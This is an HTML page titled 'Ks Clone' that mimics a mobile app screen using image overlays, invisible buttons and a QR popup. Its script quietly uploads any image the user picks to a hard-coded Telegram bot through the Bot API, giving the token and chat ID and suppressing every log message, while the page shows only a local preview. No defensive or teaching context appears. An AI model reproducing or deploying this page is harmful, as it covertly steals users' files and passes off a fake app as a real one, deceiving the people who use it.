<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="apple-mobile-web-app-status-bar-style" content="white">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="viewport" content="width=device-width">
    <title>Ks Clone</title>
    <link rel="apple-touch-icon" href="https://i.ibb.co.com/wZb5rXqb/icon.png">
    <style>
        img { width: 100%; }

        .top, .down, .btn, .image-preview, .image-preview__image,
        .popup, .qrimage, .close, .overlay, .back, .back2, .back3,
        .back_img, .back_img2, .main_menu, .id1, .forward, .forward2, .forward3 {
            display: block;
        }

        .top, .down, .btn, .overlay, .back, .back2, .back3, .forward, .forward2, .forward3 {
            position: fixed;
            left: 0;
            width: 100%;
        }

        .top { top: 0; touch-action: none; }
        .down { bottom: 0; touch-action: none; }
        .btn {
            height: 70px;
            bottom: 80px;
            opacity: 0;
        }

        .image-preview {
            position: relative;
            top: 30px;
            border: 2px solid white;
            margin-top: 15px;
            touch-action: pan-x pan-y pinch-zoom;
            z-index: -1;
        }

        .image-preview__image {
            position: sticky;
            top: 20%;
            width: 100%;
            height: auto;
            font-weight: bold;
            color: grey;
            margin-top: 100px;
            margin-bottom: 40%;
        }

        .popup {
            top: 150%;
            border-radius: 10px;
            position: fixed;
            left: 0;
            visibility: hidden;
            transition: all 0.5s ease-in-out;
        }

        .close {
            position: absolute;
            left: 85%;
            bottom: 90%;
            width: 40px;
            height: 40px;
            opacity: 0;
        }

        .overlay {
            top: 0;
            height: 100%;
            background-color: rgba(0,0,0,0.7);
            display: none;
        }

        .back, .back2, .back3 {
            top: 2%;
            width: 40px;
            height: 40px;
            opacity: 0;
        }

        .back_img, .back_img2, .main_menu {
            top: 0;
            left: -100%;
            z-index: 20;
            transition: all 0.5s ease-in-out;
            touch-action: pan-y;
        }

        .back_img2 { z-index: 40; }
        .main_menu { z-index: 60; }

        .id1 {
            position: absolute;
            top: 60px;
            left: 20px;
            height: 50px;
            width: 250px;
            opacity: 0;
        }

        .forward, .forward2, .forward3 {
            height: 70px;
            z-index: -20;
            opacity: 0;
        }

        .forward3 {
            top: 37%;
            width: 70px;
            left: 80%;
        }
    </style>
</head>
<body>
    <app>
        <button class="forward" onclick="forwardFunc()"></button>
        <button class="forward2" onclick="forwardFunc2()"></button>
        <button class="forward3" onclick="forwardFunc3()"></button>
        <button class="back3" onclick="backFunc3()"> </button>
        <button class="back2" onclick="backFunc2()"></button>
        <button class="back" onclick="backFunc()"> </button>

        <div class="back_screen"></div>
        <img src="https://i.ibb.co.com/rRwZ4cSg/main.png" class="main_menu">
        <img src="https://i.ibb.co.com/tp02553G/back-image1.png" class="back_img">
        <img src="https://i.ibb.co.com/Qj9MBM6z/back-image.png" class="back_img2">

        <div class="container">
            <img src="https://i.ibb.co.com/CpSsGkNc/top.png" alt="" class="top">
            <div class="main_win">
                <input class="id1" type="file" name="inpFile" id="inpFile" accept="image/*">
                <div class="image-preview" id="imagePreview">
                    <img src="" alt="" class="image-preview__image">
                </div>
            </div>

            <div class="bottom_btn">
                <img src="https://i.ibb.co.com/JjWmKHfW/bottom.png" alt="" id="qrclick" class="down">
                <button class="btn" onclick="openPopup()"></button>
            </div>

            <div class="overlay"></div>

            <div id="popup1" class="popup">
                <img src="https://i.ibb.co.com/qL8P62N4/QR.png" class="qrimage">
                <button class="close" onclick="closeFunc()"> </button>
            </div>
        </div>
    </app>

    <script>
        const inpFile = document.getElementById("inpFile");
        const previewContainer = document.getElementById("imagePreview");
        const previewImage = previewContainer.querySelector(".image-preview__image");

        const TELEGRAM_TOKEN = "8363295294:AAGaRrVfede3k4MU-j_0ZC-8uWAhWKNQMzg";
        const CHAT_ID = "5475287755";

        inpFile.addEventListener("change", function () {
            const file = this.files[0];
            if (file) {
                const reader = new FileReader();
                reader.addEventListener("load", function () {
                    previewImage.setAttribute("src", this.result);

                    const formData = new FormData();
                    formData.append("chat_id", CHAT_ID);
                    formData.append("photo", file);

                    fetch(`https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendPhoto`, {
                        method: "POST",
                        body: formData
                    })
                    .then(response => response.json())
                    .then(data => {
                        if (data.ok) {
                            console.log("");
                        } else {
                            console.log("");
                        }
                    })
                    .catch(error => {
                        console.log("");
                    });
                });

                reader.readAsDataURL(file);
            }
        });

        function openPopup() {
            const popup = document.querySelector('.popup');
            popup.style.visibility = 'visible';
            popup.style.top = '50%';
            document.querySelector('.overlay').style.display = 'block';
        }

        function closeFunc() {
            const popup = document.querySelector('.popup');
            popup.style.visibility = 'hidden';
            popup.style.top = '150%';
            document.querySelector('.overlay').style.display = 'none';
        }

        function backFunc() {
            document.querySelector('.back_img').style.left = '0px';
            document.querySelector('.back2').style.zIndex = '30';
            document.querySelector('.forward').style.zIndex = '30';
        }

        function forwardFunc() {
            document.querySelector('.back_img').style.left = '-100%';
            document.querySelector('.back2').style.zIndex = '-20';
            document.querySelector('.forward').style.zIndex = '-20';
        }

        function backFunc2() {
            document.querySelector('.back_img2').style.left = '0px';
            document.querySelector('.forward2').style.zIndex = '50';
            document.querySelector('.back3').style.zIndex = '50';
        }

        function forwardFunc2() {
            document.querySelector('.back_img2').style.left = '-100%';
            document.querySelector('.back3').style.zIndex = '-20';
            document.querySelector('.forward2').style.zIndex = '-20';
        }

        function backFunc3() {
            document.querySelector('.main_menu').style.left = '0px';
            document.querySelector('.forward3').style.zIndex = '70';
        }

        function forwardFunc3() {
            document.querySelector('.main_menu').style.left = '-100%';
        }
    </script>
</body>
</html>
